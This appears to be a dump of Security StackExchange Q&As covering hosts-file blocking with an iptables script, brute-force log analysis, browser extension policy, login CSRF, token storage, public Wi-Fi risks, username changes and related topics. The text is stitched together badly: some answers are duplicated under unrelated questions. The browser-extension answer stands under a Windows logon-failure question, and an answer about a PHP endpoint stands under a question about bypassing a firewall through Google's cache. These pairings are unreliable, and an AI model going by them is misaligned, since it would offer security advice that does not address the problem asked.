I'm a linux noob, and while looking for a simple OS-level website blocking technique, I came upon the solution of using the linux hosts file like so: 127.0.0.1 websiteiwanttoblock.com 127.0.0.1 anotherone.com ... This is nice and simple - perfect for my purposes, but here's my question: If I often use 127.0.0.1 for web development purposes, is this dangerous? It seems that, at the very least it could mess up the web dev project I'm currently working on? For example, if Chrome/Firefox makes a request to websiteiwanttoblock.com/api/blah , then would that make a request 127.0.0.1/api/blah and potentially mess with my project's api? If this is dangerous in that regard, is there a safer "null" ip address that I could redirect blocked sites to? I know it's probably not good practice to use the hosts file like this, but I just love the simplicity of editing a text file rather than downloading a package or whatever. Edit: Oh, and I often use port 3000 for dev stuff, but let's assume that I sometimes use 80, or any other available port number.
Short Answer Is it safe to use the /etc/hosts file as a website blocking "null" address? I would argue the answer should be: No. If for no other reason than the requests are not actually "nulled". They are still active requests. And as the OP indicates, since the requests are for legitimate Internet hosts, this sort of short cut method of redirecting requests to localhost may interfere with testing networking code in a development environment. Perhaps a better method of blocking traffic to and from certain Internet hosts, is to utilize iptables which is the interface to the Linux kernel's firewall. iptables is the default networking rule table for most GNU/Linux systems. Some distros use ufw as a front-end to iptables . If you want to use iptables , here's a simple script which will DROP all incoming and outgoing packets for a list of IP addresses or hostnames with one address or hostname per line contained in a plain text file called ~/blocking.txt ## Block every IP address in ~/blocking.txt ## DROP incoming packets to avoid information leak about your hosts firewall ## (HT to Conor Mancone) REJECT outgoing packets to avoid browser wait for i in $(cat ~/blocking.txt); do echo "Blocking all traffic to and from $i" /sbin/iptables -I INPUT -s $i -j DROP /sbin/iptables -I OUTPUT -d $i -j REJECT done Sample ~/blocking.txt websiteiwanttoblock.com anotherone.com ip.add.of.net/mask Do not place your localhost IP addresses in this file. Longer Answer While reassigning Internet hosts to localhost in the /etc/hosts file is a common short cut technique to block unwanted Internet hosts, this method has some serious security drawbacks. Incoming requests Incoming requests which were not purposefully initiated via a specific user request. The most common example is ads on webpages. Let's follow the incoming packets... First, I start up wireshark . Then I place the biggest Internet ad company in my /etc/hosts file with this line: 127.0.0.1 google.com And then disable all ad blockers in my browser, navigate to youtube and play any random video. If I filter my packets, broadly including Google's IP address space: ip.addr==172.217.0.0/16 I am still receiving packets from Google. What does this mean? It means that there is a possibility of a malicious server inserting malware which may be able to attack my computing platform via packets that are still arriving and sent to localhost. The use of /etc/hosts rather than dropping or rejecting the packets via the firewall rules, is a poor security measure. It does not block incoming packets from possible malicious hosts, nor does it provide effective feedback for trouble shooting purposes. Outgoing requests Outgoing requests which are sent to localhost rather than being rejected or dropped by the firwall rules are still being processed by the kernel. There are a few undesirable actions that occur when /etc/hosts is used rather than the firewall: Extra processing is occurring when the outgoing packet hits localhost. For example, if a webserver is running on the host, the packet sent to localhost may be processed by the webserver. The feedback from outgoing requests may become confusing if the /etc/hosts is populated with certain domains. iptables can handle lots of rules According to some: ServerFault: How many rules can iptables support A possible theoretical limit on a 32-bit machine is 38 million rules. However, as noted in the referenced post, as the iptables rule list expands so does the needed kernel memory.
{ "source": [ "https://security.stackexchange.com/questions/174350", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
174,405
This has been going on for about 1-2 days now: heinzi@guybrush:~$ less /var/log/mail.log | grep '^Nov 27 .* postfix/submission.* warning' [...] Nov 27 03:36:16 guybrush postfix/submission/smtpd[7523]: warning: hostname bd676a3d.virtua.com.br does not resolve to address 189.103.106.61 Nov 27 03:36:22 guybrush postfix/submission/smtpd[7523]: warning: unknown[189.103.106.61]: SASL PLAIN authentication failed: Nov 27 03:36:28 guybrush postfix/submission/smtpd[7523]: warning: unknown[189.103.106.61]: SASL LOGIN authentication failed: VXNlcm5hbWU6 Nov 27 04:08:58 guybrush postfix/submission/smtpd[8714]: warning: hostname b3d2f64f.virtua.com.br does not resolve to address 179.210.246.79 Nov 27 04:09:03 guybrush postfix/submission/smtpd[8714]: warning: unknown[179.210.246.79]: SASL PLAIN authentication failed: Nov 27 04:09:09 guybrush postfix/submission/smtpd[8714]: warning: unknown[179.210.246.79]: SASL LOGIN authentication failed: VXNlcm5hbWU6 Nov 27 05:20:11 guybrush postfix/submission/smtpd[10175]: warning: hostname b3d0600e.virtua.com.br does not resolve to address 179.208.96.14 Nov 27 05:20:16 guybrush postfix/submission/smtpd[10175]: warning: unknown[179.208.96.14]: SASL PLAIN authentication failed: Nov 27 05:20:22 guybrush postfix/submission/smtpd[10175]: warning: unknown[179.208.96.14]: SASL LOGIN authentication failed: VXNlcm5hbWU6 Nov 27 06:42:43 guybrush postfix/submission/smtpd[12927]: warning: hostname b18d3903.virtua.com.br does not resolve to address 177.141.57.3 Nov 27 06:42:48 guybrush postfix/submission/smtpd[12927]: warning: unknown[177.141.57.3]: SASL PLAIN authentication failed: Nov 27 06:42:54 guybrush postfix/submission/smtpd[12927]: warning: unknown[177.141.57.3]: SASL LOGIN authentication failed: VXNlcm5hbWU6 Nov 27 08:01:08 guybrush postfix/submission/smtpd[14161]: warning: hostname b3db68ad.virtua.com.br does not resolve to address 179.219.104.173 Nov 27 08:01:13 guybrush postfix/submission/smtpd[14161]: warning: unknown[179.219.104.173]: SASL PLAIN authentication failed: Nov 27 08:01:19 guybrush postfix/submission/smtpd[14161]: warning: unknown[179.219.104.173]: SASL LOGIN authentication failed: VXNlcm5hbWU6 There is one single failed login attempt every 1-2 hours, always from the same domain, but every time from a different IP address. Thus, it won't trigger fail2ban and the logcheck messages are starting to annoy me. :-) My questions: What's the point of this kind of "attack"? The rate is much too slow to do any efficient brute-forcing, and I really doubt that someone would specifically target my tiny personal server. Is there anything I can do against it except banning that provider's complete IP range? I could just stop worrying and add those messages to my logcheck ignore config (since my passwords are strong), but that might cause me to miss more serious attacks.
What's the point of this kind of "attack"? The rate is much too slow to do any efficient brute-forcing, and I really doubt that someone would specifically target my tiny personal server. You may be seeing connections very rarely, but how do you know the bots doing the brute forcing aren't constantly saturating their uplinks, and your site is just one of many being attacked? There is no advantage for an attacker to spend a short time going after one site at a time (and triggering fail2ban), compared to attacking a huge number of servers at once, where each server only sees infrequent connections. Both can have the same total rate of outgoing authentication attempts per second, but attacking one site at a time is simply a less efficient use of the attacker's bandwidth. Is there anything I can do against it except banning that provider's complete IP range (or ignoring the messages, since my passwords are strong)? No, not really. Chances are, these are coming from a botnet or a cluster of low-cost VPSes. It is not possible to determine what other IP ranges may be being used just by seeing a few of these. If they are not on the same subnet, they cannot be predicted. You can safely ignore these connections. It is nothing more than the background noise of the internet. Just make sure you aren't low-hanging fruit.
{ "source": [ "https://security.stackexchange.com/questions/174405", "https://security.stackexchange.com", "https://security.stackexchange.com/users/12244/" ] }
174,409
Recently, the company I work for has forbidden usage of any extensions in Chrome. They also do not allow account sync. This affected virtually all Web developers since they use Chrome to test their front-end code and use an extension or two to improve productivity (JSON view, Redux dev tools). Unfortunately, this has changed overnight without proper communication and there is no clear reason for this change. However, I have noticed that I am able to use a portable version of Firefox and install all needed extensions. Currently I am using Chrome 62.0 and Firefox 56.0.2 (portable). I use the portable version because the company officially allows FrontMotion and I do not want to mess with its installation. This rather old post does not show any serious security problems for Google Chrome (except for privacy). Question: Are there any objective reasons to forbid Google Chrome's extensions, but allow Firefox extensions?
I cannot answer the asked question, but I hope this could shed some light on your problem. Should corporate security rules forbid usage of some browser extension? IMHO the answer is YES here. Browser extensions can virtually do almost anything on behalf of the regular browser. That means that a local firewall will not detect them. Are there objective reasons to trust more XXX (put whatever browser of browser extension here) than YYY (another browser or browser extension). Well in IT security trust is based on 2 major pieces: audit of code and reputation. The former is objective, while the latter is not, but I must admit that I mainly use the latter because I have neither enough time nor enough knowledge to review everything, so I just rely on external advice from sources that I trust. When I rely on HTTPS to secure a channel, I must trust the certificate owner to not do bad things with the data once it has received it, and I trust the certificate signer. Long story short, it may be possible to say whether an extension has better reputation than another one, but it can only be by extension and not globally by browser. Is usage of a portable Firefox in your use case an acceptable solution? Still my opinion, but unless you are in hierarchical place that allows you to ignore a rule from the security team, I want to say a big NO here. My advice is that you should first make a list of the extensions you commonly used, and possible replacement ones. Then you should try to gather as many elements on their objective security and on their reputation (still on a security point of view). Then you should tell your manager that the recent forbidding of Chrome extension leads to a net decrease in productivity, and ask him to propose the security team a list of extensions you need with possible replacements (Firefox for Chrome by example). Then either they agree with an acceptable list, or the question should climb higher in the organization hierarchy, until someone that is accountable for both the global security and the global productivity takes a decision. Silently ignoring corporate rules is always a bad decision because the guy that has global authority has no way to know that some rules are not followed. And if your boss chooses that security is more important than productivity or the opposite, he has authority for that choice while you may not have.
{ "source": [ "https://security.stackexchange.com/questions/174409", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164712/" ] }
174,421
On our WS2012 R2, I see multiple 4625 logon audit failures. Anything between once every 5 minutes to 5 times a minute. The usernames that fail the logon attempt change frequently. But seem to be from a list of commonly used usernames (Administrator, User, Test, Sales, Bob, Intern, Admin2, BOARDROOM, BARBARA, ALAN, COPIER, BACKUP, XEROX, USER1, RECEPTION etc. ). These failed attempts also seem to continue 24/7. Since we are a pretty small company, I am quite sure that these are not legit attempts and are automated. Below is an example log from Windows logs security. Subject: Security ID: NULL SID Account Name: - Account Domain: - Logon ID: 0x0 Logon Type: 3 Account For Which Logon Failed: Security ID: NULL SID Account Name: BOARDROOM Account Domain: Failure Information: Failure Reason: Unknown user name or bad password. Status: 0xC000006D Sub Status: 0xC0000064 Process Information: Caller Process ID: 0x0 Caller Process Name: - Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): - Key Length: 0 Am I right to worry that we are hacked? How would I find out from where these failed logon attempts are coming from and stop them?
I cannot answer the asked question, but I hope this could shed some light on your problem. Should corporate security rules forbid usage of some browser extension? IMHO the answer is YES here. Browser extensions can virtually do almost anything on behalf of the regular browser. That means that a local firewall will not detect them. Are there objective reasons to trust more XXX (put whatever browser of browser extension here) than YYY (another browser or browser extension). Well in IT security trust is based on 2 major pieces: audit of code and reputation. The former is objective, while the latter is not, but I must admit that I mainly use the latter because I have neither enough time nor enough knowledge to review everything, so I just rely on external advice from sources that I trust. When I rely on HTTPS to secure a channel, I must trust the certificate owner to not do bad things with the data once it has received it, and I trust the certificate signer. Long story short, it may be possible to say whether an extension has better reputation than another one, but it can only be by extension and not globally by browser. Is usage of a portable Firefox in your use case an acceptable solution? Still my opinion, but unless you are in hierarchical place that allows you to ignore a rule from the security team, I want to say a big NO here. My advice is that you should first make a list of the extensions you commonly used, and possible replacement ones. Then you should try to gather as many elements on their objective security and on their reputation (still on a security point of view). Then you should tell your manager that the recent forbidding of Chrome extension leads to a net decrease in productivity, and ask him to propose the security team a list of extensions you need with possible replacements (Firefox for Chrome by example). Then either they agree with an acceptable list, or the question should climb higher in the organization hierarchy, until someone that is accountable for both the global security and the global productivity takes a decision. Silently ignoring corporate rules is always a bad decision because the guy that has global authority has no way to know that some rules are not followed. And if your boss chooses that security is more important than productivity or the opposite, he has authority for that choice while you may not have.
{ "source": [ "https://security.stackexchange.com/questions/174421", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164731/" ] }
174,688
I understand SSL is the predecessor of TLS. What about EV SSL? We are using a payment gateway that is rolling out a change soon and will require TLS1.1 or higher. We are currently using a SSL from Godaddy and they said that if we want to upgrade the highest they have is EV SSL. Wanted to understand if EV SSL is equivalent to TLS1.1 or lower.
I think there's a mismatch in terminology between the SSL/TLS protocol (messages sent over a network) and SSL Certificate Authorities who issue digital certificates to be used with TLS/SSL and / or other crypto protocols. SSL/TLS You are correct that SSL is the pre-cursor to TLS. This refers to crypto configuration in your server with higher versions indicating more modern crypto: SSL 1.0 (obsolete) SSL 2.0 (obsolete) SSL 3.0 (mostly obsolete) TLS 1.0 TLS 1.1 TLS 1.2 These are settings you configure in your webserver, and govern which crypto a browser will use when connecting to your server. You do need a certificate for your server in order to enable SSL/TLS, but for the most part, any certificate you get from a CA can be used with any version of TLS. SSL Certificate Authorities A Certificate Authority issues certificates for use with TLS and / or other crypto protocols like S/MIME email, signing PDF documents, etc. Most CAs market their "web server" type certs as "SSL" rather than "TLS" for historical reasons. Most CAs offer various price points of certificate, usually broken into: Domain Validated (DV) Organization Validated (OV) Extended Validation (EV) This refers to how much time their humans spend doing background checks to ensure that you do in fact own the that web site that you are requesting a cert for. They check things like: can you post a file they provide somewhere on the site? Does the DNS record for that domain list you as the owner? If the DNS record lists a company, are you in fact an employee with authorization to request certificates on behalf of that company? And so on, with DV certs just doing the automated "can you upload a file?" checks, and EV sometimes requiring face-to-face meetings between you and the CA, and original hand-signed documents from the CEO. Consequently, browsers display bigger, greener lock icons for EV to indicate to users that the browser is extra confident that this is not a phishing site. (EV certs are where you see the legal name of the company as part of the TLS lock icon). Note that bigger greener locks have nothing to do with the type of crypto or version of TLS used. Bottom line: The level of certificate you buy (DV, OV, EV) and the version of TLS that you configure your server for (SSLv3, TLS1.2, etc) have almost nothing to do with each other. All levels of certificate use the same type of cryptography, and and all certs are compatible with all versions of the TLS protocol.
{ "source": [ "https://security.stackexchange.com/questions/174688", "https://security.stackexchange.com", "https://security.stackexchange.com/users/165083/" ] }
174,724
I type www.facebook.com into my browser's address bar and press enter, then use Facebook. Could I actually be visiting a fake Facebook even if I see a URL of https://www.facebook.com and a lock icon by the side of the address bar?
You can confirm that you're on the real Facebook by a variety of ways: Inspect the certificate used to secure the site. Open up your certificate (instructions vary by browser) and see what it says - is it issued to Facebook? Is it in a valid time period? Now, look at who signed that certificate, again, turn a critical eye towards it. Make sure everything makes sense. Go down the certificate chain until you get to the root certificate. Now, go to your favorite search engine and check that none of the certificate vendors have been in the news for a compromised private key. Unfortunately, the CA based ecosystem means you have to just trust the root CA, to some degree. Check the IP address you're connecting to - use your favorite NSLookup tool to see where your DNS is pointing you when you connect to facebook.com. Take that address to google, see if it matches what people commonly say Facebook's public IP address is. See if other people have recently reported issues connecting to Facebook over TLS, or have any concerns. Consider if those concerns seem valid to you, or if they seem like the user is just doing something incorrectly. Next, take all the data you've gathered from the above points, and any other reconnaissance you've done. Think critically about whether you think it's reasonable that all of the above has been faked by a convincing virus, evil malicious actor on your network, or Mark Zuckerberg having a laugh. Also consider that the issue you want to avoid (submitting or viewing information from Fakebook rather than Facebook) and think if it's possible that the eventual consequences (data leak) could happen in another way, such as a screengrabber or keylogger virus running and just recording your input into the real Facebook. Then, consider if the risk outweights the value you'd gain from logging into Facebook. Then realize that Facebook gives you no value and decide it's not worth the risk.
{ "source": [ "https://security.stackexchange.com/questions/174724", "https://security.stackexchange.com", "https://security.stackexchange.com/users/161049/" ] }
174,850
In my opinion, arguments we have been using for years to say that public Wi-Fi access points are insecure are no longer valid, and so are the recommended remedies (e.g. use VPN). Nowadays, most sites use HTTPS and set HSTS headers, so the odds that someone can eavesdrop someone else's connection is very low, to the point of expecting a zero-day vulnerability in TLS. So, what other threats may someone face nowadays on a public network?
Public WiFi is still insecure, and it will always be if not used together with something like a VPN. Many websites use HTTPS, but not nearly all. In fact, more than 30 percent don't . Only around 5 percent of websites use HSTS. And it's still trust on first use. If the max age is short, that first use can be quite often. Let's face it, even if you are a security pro chances are that you would fall for SSL strip anyway. I know I would. Just because you use HTTPS doesn't mean you do it right. There's still lot of mixed content out there. Many clients still support old versions with known vulnerabilitites, so an attack doesn't have to be a zero day to be successful. Even if you use HTTPS, you leak a lot of of information anyway, such as the domain you visit, all your DNS traffic, etc. A computer or phone uses the internet for more than just browsing: All it takes is one app that has bad (or no) crypto for its update function and you are owned. All those apps you gave permission to access all sorts of personal data... They are phoning home constantly and you probably have no idea what data they are sending and what if any crypto they use. Dancrumb has more examples in his great answer . Defense in depth . Obviously a VPN isn't a silver bullet that solves all your security issues. But a good VPN does solve the ones specifically related to surfing on public coffee shop WiFi.
{ "source": [ "https://security.stackexchange.com/questions/174850", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15194/" ] }
174,867
I recently started using a VPN and I've felt more comfortable browsing the Internet. My VPN allows me to select another country through which my traffic is routed to make it appear I'm located in that particular country. "What's my IP" and similar services show my IP address located in that country as expected. Search engines, however, are apparently not fooled. As I go to Google, for example, the front page is in my native language and it says my true country of origin at the bottom of the page. I was aware that this happens, as a VPN is not truly a means to make myself anonymous, and companies like Google can track my true location (I assume they do this for example by looking at the country specific top-level domain of the sites I visit?). But what puzzles me though, is that other search engines, such as DuckDuckGo, which promise not to track their users in anyway, can also see my true country of origin. The front page of DDG also appears in my native language (not English). So how is it that DDG and other "non-tracking" services see my true location without "tracking" me? Even when my IP address is located somewhere else, what gives my location away in such an obvious way that DDG can still claim not to track me?
One possible explanation is that DuckDuckGo is using the headers that are sent in your request to determine their display. For example, it is very common to use the Accept-Language header to determine in which language a webpage should be displayed. This header is set by default in all modern browsers based on the language preference settings. My browser, as an example, sends Accept-Language: en-US for all requests, letting the target site know that they should attempt to send back US based English if possible. This does not require any sort of tracking to be used. If you visit https://duckduckgo.com/settings you can see what the language settings are. The default language is Browser preferred language
{ "source": [ "https://security.stackexchange.com/questions/174867", "https://security.stackexchange.com", "https://security.stackexchange.com/users/165368/" ] }
175,269
I have 2FA setup on my bank account. When I login, I receive a six-digit code as an IM on my phone that I enter into the website. These codes always seem to have a pattern to them. Either something like 111xxx, 123321, xx1212, etc. I'm thinking that these codes are intentionally easy to remember at a single glance. Is there a common business practice/best practice that dictates these codes have a pattern to them to make them easier to remember?
I have noticed this too, and I think it is a result of the human brain's tendency to apply patterns to random noise . This seems to be more common when specifically trying to remember a string of numbers.
{ "source": [ "https://security.stackexchange.com/questions/175269", "https://security.stackexchange.com", "https://security.stackexchange.com/users/1121/" ] }
175,310
If two people want to check they have the same (say 256 bit) private key, how great is the risk in sharing the first say 8 chars over a potentially public channel? Can an attacker recover any more information than just those characters, and/or how much faster could an attacker crack the key given those 8 chars?
Providing any part of the private key makes it less secure, at least marginally, simply because it provides an attacker with a smaller potential key space to explore. I fail to understand what you want to achieve. The only thing two people need to do to check if they hold the same information is exchange a hash. If you are designing a protocol and are worried about replay attacks, you can protect against it by performing a challenge response using a HMAC. Edit : As suggested the comments and explained in D.W.'s insightful answer , I need to emphasis that the impact on the security of your private key will depends a LOT of exactly what algorithm you are using. In the worse case scenario, revealing only a small part of the private key will completely break the security of that key.
{ "source": [ "https://security.stackexchange.com/questions/175310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/17549/" ] }
175,411
We've recently got a vulnerability report saying that one of our HTML forms in one of the internal applications is not CSRF protected. At first, we could not immediately reproduce it manually using the developer tools looking at the headers and cookies finding the XSRF-TOKEN present in the headers. But then, we reproduced the problem in the incognito tab or a "clean" browser. The problem was in the very first login attempt only. It appears that at the moment the first login request is posted, the client does not yet have the XSRF token since this is the very first interaction between the client and the server. Is it still a vulnerability and should be addressed if only reproduced on the very first login request? How is this kind of problem generally addressed? There probably needs to be some sort of client-server interaction before the login form submission so that the client would get the XSRF token beforehand.
This is called "Login CSRF" and is indeed a real problem that you should address. While an attacker couldn't fool a victim to log in to their own account since the attacker doesn't know the user's credentials, an attacker could fool the victim into logging in to the attacker's account. This can be used to trick a victim into giving up information to the attacker as the victim believes that they are signed in as themselves. This is indeed something that has been used to malicious ends. From Detectify : PayPal was once vulnerable to login CSRF and the attacker could make a user log in to the attacker’s PayPal account. When the user later on paid for something online, they unknowingly added their credit card to the attacker's account. Another, less obvious, example is a login CSRF that once existed in Google, which made it possible for the attacker to make the user log in to the attacker’s account and later retrieve all the searches the user had made while logged in. Even if you can't think of any way this could be leveraged on your site, a clever attacker might. There is no reason to allow it. So how do you block it? Even if the first action the user take is to log in, the first interaction they have with the server is to fetch the login page. Thats an opportunity to assign a CSRF-token. Then check for it on all requests that change the state of the server, including the login. (A tangentially related vulnerability is session fixation. Having CSRF-tokens that persist past login can expose you to that, so read up on that before you start implementing a solution.)
{ "source": [ "https://security.stackexchange.com/questions/175411", "https://security.stackexchange.com", "https://security.stackexchange.com/users/58553/" ] }
175,471
Scenario: I have a to-do list that is generated with JavaScript using JSON that was encoded on the server side. I put the todo item id in the HTML id attribute. So the process goes like this: Server side code creates a todo array. Serialize array to JSON Loop through array of JSON objects and render the todo-list. Now I have to edit a certain to-do item and update it. It is done like this: I filter my JSON object array by id by comparing the to-do id that came from the HTML id attribute value to get the object. I use AJAX to pass the object to the INSERT.PHP page. In the INSERT.PHP page I deserializ the JSON so I can update it in the database. Problem: Putting the to-do item id in the HTML id attribute will cause a flaw in the system because the user will have the capability to alter the to-do item id using the browsers developer console. Question: Is there a safe way to do it? Am I just doing it wrong or is this a normal thing to do?
Most of the details in your question are irrelevant. That the ID is stored in a HTML id attribute, the developer tools, that you are using jQuery... None of that really matters. The only thing that matters is that you have an endpoint on your server called insert.php . An attacker can send any request they want to that endpoint, regardless of what your client code looks like. Protections against people trying to do things that they are not allowed to do must be at the server, and not the client. So look at your PHP code. Does it verify that the input is in the expected format? Does it check that the user has the right to edit the particular todo list? If not, fix it. And remember, your validation and authorization checks must be performed on the server to have any security value. Specifically, if users should only be allowed to edit todos that they own you need to do the following in insert.php : Query the database to get the owner of the todo that is being modified. Get the id for the user making the request. Check that they are the same, and deny if they are not.
{ "source": [ "https://security.stackexchange.com/questions/175471", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166142/" ] }
175,475
I'm using a physical Stormshield Firewall to control connections of a private companies. There are rules to block some websites, like video games websites, Facebook, etc. However, these websites can still be accessed. For this, you search the website on Google, right click-it and open the cached version of it, which bypass my restrictions. Any idea about how to deal with this?
Most of the details in your question are irrelevant. That the ID is stored in a HTML id attribute, the developer tools, that you are using jQuery... None of that really matters. The only thing that matters is that you have an endpoint on your server called insert.php . An attacker can send any request they want to that endpoint, regardless of what your client code looks like. Protections against people trying to do things that they are not allowed to do must be at the server, and not the client. So look at your PHP code. Does it verify that the input is in the expected format? Does it check that the user has the right to edit the particular todo list? If not, fix it. And remember, your validation and authorization checks must be performed on the server to have any security value. Specifically, if users should only be allowed to edit todos that they own you need to do the following in insert.php : Query the database to get the owner of the todo that is being modified. Get the id for the user making the request. Check that they are the same, and deny if they are not.
{ "source": [ "https://security.stackexchange.com/questions/175475", "https://security.stackexchange.com", "https://security.stackexchange.com/users/161726/" ] }
175,536
We were recently handed a security report containing the following: Cookie(s) without HttpOnly flag set vulnerability, which we apparently had in one of our internal applications. The applied fix was as simple as setting Django's CSRF_COOKIE_HTTPONLY configuration parameter to True . But, this is what got me confused. The Django documentation says: Designating the CSRF cookie as HttpOnly doesn’t offer any practical protection because CSRF is only to protect against cross-domain attacks. If an attacker can read the cookie via JavaScript, they’re already on the same domain as far as the browser knows, so they can do anything they like anyway. (XSS is a much bigger hole than CSRF.) Although the setting offers little practical benefit, it’s sometimes required by security auditors. Does this mean that there is no actual vulnerability here and we just have to be compliant with the security auditing rules?
As joe says , there is no real security benefit to this. It is pure security theater. I'd like to highlight this from the documentation : If you enable this and need to send the value of the CSRF token with an AJAX request, your JavaScript must pull the value from a hidden CSRF token form input on the page instead of from the cookie. The purpose of the HttpOnly flag is to make the value of the cookie unavailable from JavaScript, so that it can not be stolen if there is a XSS vulnerability. But the CSRF-token must somehow be available so it can be double submitted - thats the whole point with it, after all. So Django solves this by including the value in a hidden form field. This negates the whole benefit of HttpOnly, since an attacker can just read the value of the form field instead of the cookie.
{ "source": [ "https://security.stackexchange.com/questions/175536", "https://security.stackexchange.com", "https://security.stackexchange.com/users/58553/" ] }
175,707
In his paper Defective Sign & Encrypt in S/MIME, PKCS#7, MOSS, PEM, PGP, and XML , Don Davis is often talking about the term naïve sign & encrypt After reading the paper, I'm not 100% sure what exactly is meant with this. Does he mean the possible habit of (mainstream) users thinking that sign & encrypt is an acceptable security practice? (Although there is no assurance about who encrypted your message)
The author seems to use "simple" and "naïve" interchangeably. Yes it seems he is referring to the act of signing (with the senders private key) and encrypting (with the receivers public key) the plaintext before transmission. He views this as naïve because of the ability for a third party to forward a pre-existing signed message written by the sender to the receiver and the receiver assuming it safe to trust this. Imagine a situation where Bob and Alice are attempting to communicate securely. Chuck is an untrusted third party known to both of them. Chuck sends Bob a series of questions for which he expects Bob to reply with fairly generic responses. For example Chuck asks "Did you read Dons paper?" and Bob sends back "Yes" - signed and encrypted. Alice sends Bob a message saying "Can I trust Chuck". Chuck knows Alice is going to do this. Chuck decrypts the signed "Yes" message from before and re encrypts it with Alice's public key. He then sends it to her before Bob can reply. Alice receives a reply to her question saying "Yes". It is signed by Bob and was sent encrypted with her public key so she trusts it.
{ "source": [ "https://security.stackexchange.com/questions/175707", "https://security.stackexchange.com", "https://security.stackexchange.com/users/161637/" ] }
175,783
I am currently working on an Application which is a single page application built with Angular. It is served over HTTPS, using HSTS. For authentication, we are using Auth0. The Auth0 documentation recommends storing the access token in localstorage. An interceptor is then used to add this to the header of each HTTP request. However, this answer recommends not storing any sensitive information with localstorage. The answer is from 2011, and the author also co-wrote the OWASP HTML5 cheat sheet, which states: Pay extra attention to “localStorage.getItem” and “setItem” calls implemented in HTML5 page. It helps in detecting when developers build solutions that put sensitive information in local storage, which is a bad practice. I am wondering if the situation in 2017/2018 has changed. Am I OK to follow Auth0's guidelines, or should I take another approach?
Personally I see no issue with using local storage as long as you are happy with the user not having to re-authenticate between sessions. The linked answer provides the following argument against this. I would argue it is very weak - Underlying storage mechanism may vary from one user agent to the next. In other words, any authentication your application requires can be bypassed by a user with local privileges to the machine on which the data is stored. Therefore, it's recommended not to store any sensitive information in local storage. This applies with any kind of authentication token. Someone local with admin privileges (assuming its not encrypted with a key tied to the users credentials) can read it out of any kind of storage, RAM or maybe even straight off of the network. He also suggests - (or XSS flaw in the website) Again - this applies to any kind of token that the JavaScript can access.
{ "source": [ "https://security.stackexchange.com/questions/175783", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6838/" ] }
175,802
I have looked all over online as well as this site to try to find out more information regarding the security of this, but haven't found anything. In my particular case, the product is a website, but I think this question applies for any software that hosts a large number of users. I know there are numerous websites out there that allow you to change your username, but at the same time there are many that do not allow it. I'm sure some that do not allow it may be just for simplicity, but possibly for security as well. My question is just like the title asks: From a security standpoint, would you say it is good or bad practice to allow individuals to change their username? I currently cannot think of any reason not to allow it, given it is done properly (ie make it impossible for duplicate usernames, require inputting current password to make sure password requirements are still met regarding not containing username, etc), but I can't help but think there's something I'm missing. I know there are advantages from the user's perspective to allow them to change their username. An example would be if they set their username to their email address and decide to use a different email address later. Instead, I'm curious of the benefits vs risks regarding the security of the application and login process if you allow them to change their username. EDIT: Some of the answers bring up good points regarding publicly-displayed names, but to clarify, the question is not regarding any public display name, but instead the unique username used to log in.
Many people have looked at the reasons not to allow name changes from both a security and a community standpoint. However, there are plenty of legitimate reasons to allow username changes, even if the username is separate from the display name , for example: Someone has changed their real life name or the name by which they'd prefer to be called, due to marriage, family situations, escaping stalking/harassment/etc., and so on Even in the case of it being simply a username, having to use an old name which carries trauma can further the trauma. Also, it is quite possible for a stalker/harasser to know their target's login credentials, and being able to change both parts of the credential lowers the attack surface; further, monitoring attempts at logging in to an abandoned username allows for building a legal case against a bad agent. People have decided to move forward on a gender transition Being forced to use one's "dead name," even in the context of a private username, is also very traumatic. (I can speak to personal experience on this one.) People have a username that they no longer feel suits them for whatever reason This has less of an implication for internal usernames but it's still better to err on the side of kindness, in my opinion. These are all important for user comfort, and in many cases people would likely just create a new account with the new name anyway, so might as well support it. Avoiding social engineering certainly is important but there are approaches that help to mitigate this, such as various forms of verification (as seen on several social networks), public-key cryptography, and profile indicators ("name last changed N months ago; name changed K times"). And, since this question has been edited to be regarding internal user names and not public display names, those concerns aren't even germane to the discussion. Also, keep in mind that many attack surfaces provided by someone changing their username is also present for someone simply creating a new account, and if a username change option is not available then the user will likely create a new account - possibly using the same password as the old one and otherwise doing things that might lead to compromised security. It is a good idea to maintain an audit trail of username changes and disallow the creation of new accounts that use a previously-used username (at least if the username was last used within the past, say, year), but there is no reason that the username should ever be the primary key used to associate data with the user account in the first place, because there are legitimate purposes for a username change and all account records should be normalized to an abstract internal-only ID in the first place.
{ "source": [ "https://security.stackexchange.com/questions/175802", "https://security.stackexchange.com", "https://security.stackexchange.com/users/166511/" ] }
175,866
Listening to the Secure code lessons from Have I Been Pwned made me really think about logging. It appears that in the real world a lot of data breaches are discovered long after they happened which makes the investigation and recovery much more difficult because oftentimes there are no logs to follow and research. What can we do about it? Should we keep all the application/system/webserver logs forever?
There is no "correct" answer to your question, unfortunately. Data retention policies are specific to the needs of an organization, and are often implemented out of necessity to comply with various legal requirements , which vary depending on the nature of the data being stored, as well as the jurisdiction that the data falls under. Retaining log data can allow for post-mortem analysis if a breach is discovered, as you're alluding to in your question. However, retained data can also be a security risk in its own right if the logs contain sensitive information, so steps must be taken to secure log files if necessary. The other obvious factor in play is the cost of keeping the logs. Depending on availability requirements, different backup solutions may be more cost effective than others, such as keeping old logs offsite on tape storage rather than using disk redundancy.
{ "source": [ "https://security.stackexchange.com/questions/175866", "https://security.stackexchange.com", "https://security.stackexchange.com/users/58553/" ] }
175,977
